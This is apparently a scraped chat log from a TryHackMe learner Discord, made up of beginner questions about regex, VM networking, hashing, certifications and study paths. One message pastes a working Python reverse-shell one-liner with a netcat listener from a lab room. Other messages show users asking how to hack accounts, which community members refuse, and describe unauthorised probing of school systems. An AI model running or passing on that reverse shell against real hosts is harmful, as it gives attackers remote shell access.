weary meteor
quiet yacht
#

Thanks for the reply, i want to get some inforamtion about the exam (if i can rely on rockyou for password... ) im a kind of worring about the exame... psyDuck

weary meteor
fathom panther
quiet yacht
#

ok thanks

burnt night
high wasp
surreal quiver
#

Anyone know some honeypots for personal use?

terse jungle
#

Do you guys tend to learn what you're interested in or what you view as most lucrative?

#

I ask because I have the CCNA and Network+, I feel like I should focus on network topics but of all the topics I've found in THM, by far the most interesting to me is malware analysis. Despite how much it intrigues me, I don't see this ever being relevant to my job (lvl 1 help desk) or in any roles I could apply to in the near future.

turbid wasp
#

For example, I'm just a software developer/engineer at work, nothing to do with security, but my interest in DFIR has actually helped me "reverse engineer" some programs and write my internal tools for data analysis and calculations at our organization.

turbid wasp
#

Plus, if you broaden your knowledge base you're less at a risk of pigeonholing yourself and waking up one day realizing you're stuck in a career you're no longer interested in (I'm not saying you don't like your job or anything, it's just nice to have options just in case πŸ™‚ )

terse jungle
hoary nymphBOT
#

Gave +1 Rep to @turbid wasp (current: #1068 - 4)

turbid wasp
nova linden
#

Probably focusing on the wrong thing here, but do you think there's a point of having dual-boot and run a linux on hardware or just windows with VMs is enough to test everything I'll need as a beginner?

fathom panther
#

There is no big benefit with running Linux (afaik) as a desktop other than personal preference imo.

weary meteor
alpine mango
#

Hy, Can anyone help me with it:
Match all of the following filenames: ab0001, bb0000, abc1000, cba0110, c0000 (don't use a metacharacter)

_ _ _ _ _ { _ , _ } _ _ _ _ { _ }

alpine mango
#

regular expression

weary meteor
alpine mango
#

no, i tried it so many times but couldn't get right

weary meteor
alpine mango
#

this is question 4 in task 4 of this room, we need to get regular expression that can give all names as above give in the question

weary meteor
alpine mango
#

i tried this one: a * b * c { 0 , 1 } [ 0 1 ] { 4 }

#

these curly brackets can't be changed

#

we need to get these file names: ab0001, bb0000, abc1000, cba0110, c0000 (don't use a metacharacter)

weary meteor
# alpine mango i tried this one: a * b * c { 0 , 1 } [ 0 1 ] { 4 }

Ok , this looks good , we only need to fix a few things . First of all , you don't need * , we can use just [abc]
Second , we know that our characters [abc] would be in the first 3 places we can specify that using {1,3}
Next we'll have either 0 or 1 [01] , repeated 4 times {4} . So in concucluion our final regex would look something like this :
[abc]{1,3}[01]{4}

#

[] - specify characters
{} - number of repetitions

alpine mango
#

yeah i got it, thanks a lot @weary meteor

hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 3258)

civic oak
#

hi everyone SNORT is firewall or IDS system ? some say that it is firewall and some say that it is IDS ?

civic oak
#

thx

civic oak
#

Does anyone got any project with raspbery pi ? I am thinking about making a project with it like IDS/VPN/FireWall that kind of things. Does it have a big impact on the job CV ?

mild viper
#

I have had someone claim to me that you can monitor somes SMS inbox just by knowing their phone number.

Is this something commonly known?

next bronze
#

you can't intercept SMS by just knowing the phone number, in 99% of cases it requires physical access or at least requires the victim to be connected to a compromised cell tower

mild viper
hoary nymphBOT
#

Gave +1 Rep to @next bronze (current: #242 - 30)

fathom panther
next bronze
#

I mean, yes that's true

pale quest
#

hi

zinc iris
winter patrol
#

Heya

weary meteor
rain drum
#

guys can any one help

tawdry dove
wary lagoon
#

is there anyone to help with the windows troubleshoot command ? I have got this question in tryhack me pre security path windows fundamental 2. It has 30 characters in answer i couldnt get it

rain drum
# tawdry dove With?

i need a tool to hack but idk wich one i tried kali linux but next day it dont work

harsh linden
rain drum
#

idk actully am new

#

that why am asking for help

harsh linden
narrow cape
rain drum
#

like if i wanted to hack some one acc

#

what i need to do it

harsh linden
rain drum
#

no no i just want to learn πŸ˜‚

#

i wont do it

narrow cape
#

We can help you to learn about ethical hacking

#

There is one important adjective there

rain drum
#

what is that

#

how can i use it

south inlet
rain drum
#

bro i wont hack some one i just want to learn this

#

because why not

south inlet
#

Just learning doesn't make it legal

rain drum
#

bytw am arab country

spice vapor
# rain drum bytw am arab country

there is no tool or person who can always hack stuff if there is a way you can hack some account its like a hole in the wall of security and will be fixed you have to invent or find new ways new holes new vulnerabilities which is extremely difficult and require decades of learning at that level you will not be thinking of such petty things like hacking you GF account because that's not worth the effort

kind ember
#

Trying not to feel sheepish and slow at learning this stuff. My friend who codes professionally, goes to hackercon, etc. just told me that if I can hack his wifi cameras he'll give me 500$.
I think he's just jealous that even though I am literally starting my first course in my learning path (guys I'm 10% done in the careers in cyber lol) that I just got a flipper zero; which I'm learning that flippers are cool but there's cooler tools to help execute things? I know I'll get there some day lol

burnt night
hushed oracle
#

While good advice, if it is a very trusted friend it could be fine as well.
Just keep in mind that the general law on hacking in IT is, very similar to constent (xD). Do you have (written) permission? Then fine. Otherwise it's easier to stay away or risk fines and jail.

twilit lantern
#

@south inlet

civic rootBOT
#

Done!

hoary nymphBOT
#

You can't modify your own Rep... Silly

stiff zinc
#

i was trying haha

ancient relic
#

hii
sorry to bother u guys ivee just installed tryhackme
and i have a problem if one of u want to help me
ive jusst started DFIR: An Introduction
and the sitee where i can practice does not work
any ideas?

ancient relic
#

srrry

barren cloud
wise nacelle
#

How can I open a study room here in this channel

stark bane
#

Anyone having support material or ways for php site testing please let me know.

south inlet
lofty aurora
#

hello can somebody tell me why https://tryhackme.com/room/linux2 this room is not available? It's showing - This room is private

Only users with the room link can access this room...

weary meteor
lofty aurora
grand mango
#

Are there any good rooms to learn splunk

tawdry sky
#

Hello. It might come as a shock what i'm gonna ask but i was having shower thoughts one day and asked; what is the difference btw hashing and encryption? And now I cannot see a clear distinction btw them 😭 . I learn by knowing what something does rather than what it is and I know that there was a CRUCIAL reason why hashing did what it to be distinct from encryption, but i have forgotten. So yes that is my question; hashing vs encryption

tawdry dove
harsh linden
tawdry sky
#

I had a deeper distinction btw them but thanks

harsh linden
harsh linden
# tawdry sky I had a deeper distinction btw them but thanks

well, a hash you would use when you don't need to recover the data - most likely just compare it to another piece - as the same data yields the same result

encryption you would use it if you need to recover the original data.

i'm not sure what other explaination you need from it - perhaps using google as stated above to find your answer is best.

tawdry sky
#

Yeah i'll try google again

civic oak
#

Hey everyone I got this on the properties of my c: disk I have done research and the microsoft says that it could be from an account wich had access but deleted after. Should I do something about it or just leave it like that withour doing a thing ? anyone got a thing like that ?

harsh linden
#

Probably innocuous, but I’m interesting to hear what the windows gurus have to say πŸ‘€

civic oak
rugged frigate
#

If it's a disk from you previous system than it will be the identifier from your older account.

night cedar
#

Yo dudes wazxup

surreal quiver
#

Hey guys, you know how ubuntu has like multiple desktops? Can you connect 2 screens and use 2 desktops if you know what I mean?

wanton pewter
#

Yes they are called workspaces

#

With different screens, you can get separate workspaces but still connected.
If you want to separate them completely, you will have to modify gnome settings

weary meteor
surreal quiver
#

How? Can you send a link or something?

fair vine
#

1 google search bud @surreal quiver "workspaces ubuntu"

#

if thats what ur looking for

surreal quiver
hoary nymphBOT
#

Gave +1 Rep to @fair vine (current: #252 - 28)

surreal quiver
#

I have connected the second screen that is a pc monitor for which I had to use a vga cabel that was being used on a tv and switch the tv to a hdmi cabel but now the picture on the tv looks a lot worse is there any way to improve it? Has anyone had any experience with this?

rugged frigate
#

check if the native resolution is set on the pc for that display.

kindred kestrel
#

I have a random question. I just finished the Metasploit exploitation room. And Task 7 has me a bit confused. You're using venom in that task. But you have to access the host you're trying to attack and transfer files there, and perform x, y, and z tasks..... but how is this applicable in real life? Presumably you wouldn't have that access on the host you were trying to attack BEFORE performing the Venom attack, right? I feel like I'm missing a puzzle piece here....

weary meteor
kindred kestrel
#

Ok. That makes me feel better.... so, for example, in real life a preliminary attack of some sort would need to be done to enable to to get that control of the host you want to use the venom payload on?

kindred kestrel
#

As usual, your help is always appreciated, man..... thank you.

surreal quiver
surreal quiver
wanton pewter
surreal quiver
fair vine
#

best resolution doesnt mean its the best option

#

what resolution is your monitor

deft mortar
#

i have a problem with openvpn and i try everything and nothing fix it "TLS Handshake failed" , any one have idea how to solve it ?

fair vine
fair vine
#

hi @bright ingot can you try #room-help with your query

#

like put your questions there

hoary nymphBOT
#

Gave +1 Rep to @fair vine (current: #245 - 30)

weary meteor
surreal quiver
fair vine
#

did you try putting your resolution to those?

surreal quiver
spark sun
remote nacelle
#

wat tha

#

wats slow mode

weary meteor
drowsy onyx
#

Hi anyone ever connected a kali Linux vm to an iPhone hotspot ? I understand connecting to my hotspot on my pc but should my Kali be in Bridged, Nat or another adapter type in VBox ?

wanton pewter
#

The connection is visible and available, never tried connecting it though. Any issues?

drowsy onyx
#

Well if i put my Host pc in hotspot it works i see my iphone name , if i put my kali in bridged or Nat it will say "wired connection" which i removed my ethernet. My iphone ip for exemple is 200.200.100.10 and my kali is 200.200.10.101 . These are example numbers , does it mean my kali is on the iphone network since it has the same network range ?

wanton pewter
drowsy onyx
#

Sorry its a typo the 3 first are the same just not the last .xxx

wanton pewter
#

So it’s the same network. About the Wired thing, NAT means the kali will not be visible to iPhone and it will take its connection through the host machine

#

If its set to bridged, then iPhone acts as a DHCP and assigns an IP to the kali directly for it to access the network

#

Did I get your question right? Check VMware settings and make sure wifi is set to bridged and not Ethernet

drowsy onyx
#

Im on Vbox , its such an annoying thing . im doing something as practice and it doesnt make sense , how would giving my kali my iphone hotspot help with doing some pentest ... Would that bypass SMB or what like i dont understand

autumn trout
#

Can someone help me with docker networking pls? I am trying to connect to Ollama not in docker inside this docker container and i dont really know what im doing 😦

services:
  sillytavern:
    build: ..
    container_name: sillytavern
    hostname: sillytavern
    image: ghcr.io/sillytavern/sillytavern:latest
    ports:
      - "8069:8000"
    volumes:
      - "./config:/home/node/app/config"
      - "./data:/home/node/app/data"
      - "./plugins:/home/node/app/plugins"
      - "./extensions:/home/node/app/public/scripts/extensions/third-party"
    restart: unless-stopped
    environment:
      - OLLAMA_HOST=http://host.docker.internal:11434
      - OLLAMA_API_BASE_URL=http://host.docker.internal:11434
    extra_hosts:
      - "host.docker.internal:host-gateway"
wanton pewter
drowsy onyx
spark sun
drowsy onyx
#

And to be clear im not looking for help or cheating i just don’t understand the reasoning behind using phone data … Like i tried with using my data but nmap, crackexec , or any scans didnt change anything so idk what hes asking lol

#

Im genuinely curious if anyone is good enough in networking to know the reasoning behind, because we were never teached this and he threw that at us lol

wanton pewter
#

At this point you don’t need an expert, you need your teacher to explain it to you, lol

drowsy onyx
#

My brain hurts oof i cant type

quaint basin
# drowsy onyx Hi anyone ever connected a kali Linux vm to an iPhone hotspot ? I understand con...

You, uh, need to learn the difference between wireless networking, wired networking, and virtual networking.

As far as your VM is concerned, it thinks it has an ethernet cable plugged into its NIC, regardless of what mode you put it in.
The VM physically does not have the hardware to make radio connections.

i.e., you need to physically give it that hardware. You would usually do that with an external NIC and USB pass through -- e.g., https://amzn.eu/d/12JsThT

drowsy onyx
drowsy onyx
quaint basin
#

I mean, it's doable.

#

You just need extra hardware

drowsy onyx
#

Yeah but not without buying … which we arent gonna buy

quaint basin
#

Technically you might be able to pass through your integrated NIC? Not sure how effective that would be though.

drowsy onyx
#

Last semester he made us do some port forwarding on a lab without us even knowing what it was , so its kind of is trend to do stuff we never learned yet

#

Port forwarding as whole aint complex but making someone who as zero knowledge of security and risk do it is kind of a risky move

quaint basin
tawdry dove
#

You can get an $8 usb dingle and pass it through to the VM

quaint basin
#

No surprise there kekw
I suspect the VM would probably be okay given it would be able to connect direct to the wap, right?
The host would be screwed though lmao

tawdry dove
#

*dongle

tawdry dove
quaint basin
#

Curious

drowsy onyx
#

Man this is absurd yall are using big boy words and my brain hurts lol

tawdry dove
#

What words are you confused by? So we can clarify

drowsy onyx
#

Never i realized what they were my brain is just hurting

#

So in other words connecting a VM in virtualbox ( Kali ) to my phone share data aint much of a possibility ? Why even is he asking that … like i guess he didnt try

#

I made my pc run on my hotspot and then the vm in NAT or bridged , both gave results , they got the same network range as the iphone but they don’t do what theyre supposed

quaint basin
#

Preferably one which supports monitor mode, just in case you fancy doing any wireless hacking.

tawdry dove
drowsy onyx
quaint basin
#

Well that's sketch af

drowsy onyx
#

So unless the firewall is blocking us seeing the org type idk what else. Like the org name that appears is crown castle which i guess is there server provider or something

#

So all day a bunch of student are doing hydra, scans , and other commands and everything on a server which as far as im concerned is not the one we should

quaint basin
#

Yeah, we ain't helping with that lmao

drowsy onyx
#

I know lol i was only asking for the networking thing earlier but at this point ive given up because hes not doing something rigjt

spark sun
tardy ravine
#

I know it’s odd, but the reason I’m here is cause someone I have friended on an app has gotten information about me that’s unavailable, I kinda wanna get back at them or maybe make it to where that information is hard to find, if that’s possible

quaint basin
#

Or @south inlet

odd acorn
dapper flicker
quasi palm
#

I need help with this Above your account balance, you should now see a message indicating the answer to this question. Can you find the answer you need?

wraith echo
#

yay guys today I am fresh on highschool and I found today zero-day vulnerability on every compute on school. Unlocked BIOS and free SYSTEM permission to allow browse other students files without normal restriction. Potential access to active directory. Feel unreal. Already reported it to admins hope they got it fix it soon.

wanton pewter
#

Be careful from the next time, doing it without their permission can result in legal actions

shadow compass
#

Yo guys can sm help me with sm?

wraith echo
hoary nymphBOT
#

Gave +1 Rep to @wanton pewter (current: #807 - 6)

wanton pewter
wraith echo
#

Yeahh it was like being in matrix its a lot different from all those CTF machines u do. The best part of this story is that the school is teaching cybersecurity and is considered as most prestige in my area.

wanton pewter
#

Make sure to make your journey count. Self study is still the most important part.

wraith echo
#

Will do🫑 Working towards it everyday.

wanton pewter
#

Ahh so its a global issue, I thought its just my feed, lol

fathom oak
wanton pewter
#

They probably don’t know why it’s happening πŸ˜†

soft pier
#

shadow is sad that when facebook messed up bgp they were not gone forever

wraith echo
#

Oh well if they gonna hop in with manual removing it must be messing up with your brain

tawdry dove
feral kelp
#

Very impressed by the fact that you’re in high school and are at that skill level πŸ˜‹

wraith echo
feral kelp
#

Girl what the hell wdym by 10 😭

#

Did your mom watch Mr Robot while pregnant with you

wraith echo
#

Nah I am obsessed with that show but never get the chance to watch it till endπŸ˜”

#

Yeah when I was 10 I saw so many cyberec. attack happening at that time and I was like how the fuc is this possible how do "they" achieve it and so I started learning till this moment

feral kelp
#

I only started asking myself that question recently xD
I’ve always had a fascination with malware and cyberattacks so I’d often read Malwarebytes blog posts. Anyway, learning about different attack strategies made me wanna start studying cybersec for real πŸ™ƒ

wraith echo
#

Cheering for ya its interesting path but full of patience🫑

#

Can suggest you how I started with whom and what platforms if interested

bronze flax
#

Good morning everyone! My name is Eddie! I’m looking to get into cybersecurity without paying thousands of dollars for a bootcamp. Does anyone have any suggestions, resources or recommendations on how to get started, learn some skills, build a portfolio and eventually land an interview/job?

wraith echo
# bronze flax Good morning everyone! My name is Eddie! I’m looking to get into cybersecurity w...

Heyy Eddie glad to see you here! Absolutely I have few suggestions. Start with free resources like YouTube, Wikipedia, and libraries. It takes time to find good explanations, but engaging with videos, reading Wikipedia pages, and asking questions helps. Attend cybersecurity events and contribute where possible. Once you understand the basics, set up virtual machines (VMs) to practice tools and network concepts (DNS, proxies, VPNs, etc.).

Apply knowledge by working on projects, like writing reports on cybersecurity topics. Build a reputation by joining ethical hacking platforms and competing in Capture The Flag (CTF) challengesβ€”use walkthroughs to learn from failures. Take notes on everything you learn. Create a LinkedIn profile and share your progress. Finally, be cautious of misinformation in cybersecurity content.

wanton pewter
# wraith echo Heyy Eddie glad to see you here! Absolutely I have few suggestions. Start with f...

He is totally new to this field, I would say directly going to basic level hand on is better than just learning from Youtube. Like starting from Pre Security in THM is great and infact you really don’t need anything else during the starting phase. And since he has already purchased the premium of TryHackMe, he should continue till he has enough skills.

After that he can follow as you said with CTFs and also go for some recognised certifications to standout on his profile.

wraith echo
#

Yeah your right just saying from my expirience

wanton pewter
# wraith echo Yeah your right just saying from my expirience

I mean you started at 10, that too 8 years ago, it was harder back then but now he doesn’t really need to go around looking for resources just to break into the field, thanks to the online learning platforms. And TryHackMe over HTB just because it’s beginner friendly and pocket friendly.

hoary nymphBOT
#

Gave +1 Rep to @wraith echo (current: #2705 - 1)

wraith echo
random river
# bronze flax Good morning everyone! My name is Eddie! I’m looking to get into cybersecurity w...

Check out the free road map on THM -> after some time with it, consider if the way THM teaches is for You. If so- go for premium, its really worth it.
Check prerequisites for ComptiaSecurity+, then OSCP. While the Comptia is a theory exam and You can learn on Your own, for OSCP You need some practical skills - there's a room for it as well, but following cybersecurity paths will lead you to win as well.
Consider learning and getting a certification in networks (thats optional, but it will help You a lot with finding first job - it as well gives a lot of skills in networking which is valuable)
Theres more certificates to do, but focus on THM pathway and OSCP requirements.
During Your cybersecurity studying its worth learning programming language - i would recommend Python.
And remember- keep going, everything is obtainable πŸ™‚
More advanced roadmap:
https://pauljerimy.com/security-certification-roadmap/

weary meteor
#

@odd acorn

pine jacinth
#

Does anyone want to be friends on THM? I saw they have a place you can add friends, I’m trying to keep the hype train going if anyone wants to drop their username

weary meteor
zinc iris
weary meteor
wanton pewter
weary meteor
wanton pewter
#

Ahh humble 🀧

pine jacinth
zinc iris
zinc iris
woven vortex
#

Aye another one of those lovely beginners here. Quick question about what i can expect from THM. Currently taking the pre-security path and working toward pentesting and/or red team. By the end of the respective paths for these in THM, what can I expect my "skill-level" to be? What more would I need to do to get a job in these fields?

zinc iris
woven vortex
hoary nymphBOT
#

Gave +1 Rep to @zinc iris (current: #1770 - 2)

fair wave
#

hi

#

boys

woven vortex
#

1 more question. Currently, im about to finsih netwrok fundamentals in the pre-security path. My strategy is watching the video (with an ear out for analogies/further explanation than the reading). Anytime I struggle to understand the concept, I go to chatgpt and beat it down till something clicks. Then, I solve the problems on my own. Do you guys think this is an effective learning strategy for optimal gain?

weary meteor
zinc iris
#

hi

#

I have a question, I used echo to add something to a text file , the file already had some data in it , and it all gone when I use d echo and now I have only one line (the new one I just added) is there any way to undo that and retrive the data ?

weary meteor
spark sun
high token
#

Hey would anyone happen to know why netcat listener doesn’t pick up any traffic on Linux when using reverse shells?

wraith echo
#

Hey can I add you too? @weary meteor , @pine jacinth ? or just anyone who is okay with being friends on THM?

high token
# weary meteor What is your command ?

I Was doing the THM pyrat lab. I had nc -nvlp 1337 listening.
Then I had
nc pyrat.thm 8000
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("My-ip",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

#

Used nano /etc/hosts and put in the ip and named it pyrat.thm

high token
#

Ok πŸ‘πŸ»

elder verge
#

Hello... I am Mubashir... i am a try hack me beginner... im looking for partners to learn together and build future partnership and workspace... if you are willing to join in try hack me and be friends pl send request mubashir.3lancer@gmail.com Thanks and happy learning.

wheat torrent
#

Some times i don't get why my nc doesn't work

#

Is this because of using wrong ip or something ?

weary meteor
next bronze
wheat torrent
weary meteor
wheat torrent
next bronze
#

what kind of command, what attack you're doing, etc

wheat torrent
next bronze
wheat torrent
next bronze
#

you can use nmap directly

wheat torrent
#

I am just clearing my doubts

next bronze
#

Yeah, you could

#

If those complex commands are already in the $PATH env variable, you wouldn't need to bother though

#

if they're not, then sure save it in a shell script and symlink it

wheat torrent
#

Ok thanks a lot πŸ™

elder verge
lime kraken
#

when will the complete beginner path removed from TryHackMe ?

south inlet
#

Soon.

pine jacinth
pine jacinth
elder verge
weary meteor
wheat torrent
#

@next bronze can i add you as a friend ?

surreal quiver
#

Any idea how to get copy/paste from host to guest to work?

weary meteor
south inlet
surreal quiver
#

VMware

#

I think it's enabled I also tried installing reinstalling open-vm-tools didn't work

south inlet
#

Settings of the VM > options > Guest Isolation

surreal quiver
surreal quiver
#

Hey can I add you guys @weary meteor @pine jacinth @wraith echo ? if anyone wants to add me feel free (ttryinnggghaackkeerr)

weary meteor
pine jacinth
pine jacinth
weary meteor
weary meteor
surreal quiver
#

No way, I'm from πŸ‡­πŸ‡· too

woven vortex